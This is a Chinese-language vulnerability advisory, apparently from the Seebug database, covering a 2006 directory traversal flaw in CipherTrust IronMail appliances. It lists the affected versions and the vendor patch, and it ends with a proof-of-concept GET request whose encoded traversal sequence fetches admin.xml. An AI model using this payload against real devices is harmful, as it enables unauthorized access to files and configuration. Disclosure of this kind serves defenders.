Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:105
HistoryOct 25, 2006 - 12:00 a.m.

IronWebMail目录遍历信息泄露漏洞

2006-10-2500:00:00
Root
www.seebug.org
4
JSON

IronWebMail是一款企业级的硬件防火墙设备。
IronWebMail在处理畸形HTTP请求时存在目录遍历漏洞,远程攻击者可以利用此漏洞通过在URL中嵌入编码后的目录遍历串访问设备上的任意文件。

CipherTrust IronMail 6.1.1
CipherTrust IronMail 5.0.1
CipherTrust IronMail 4.5.1
CipherTrust IronMail 4.1
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.ciphertrust.com/


                                                GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml)<br />
HTTP/1.0[CRLF][CRLF]
JSON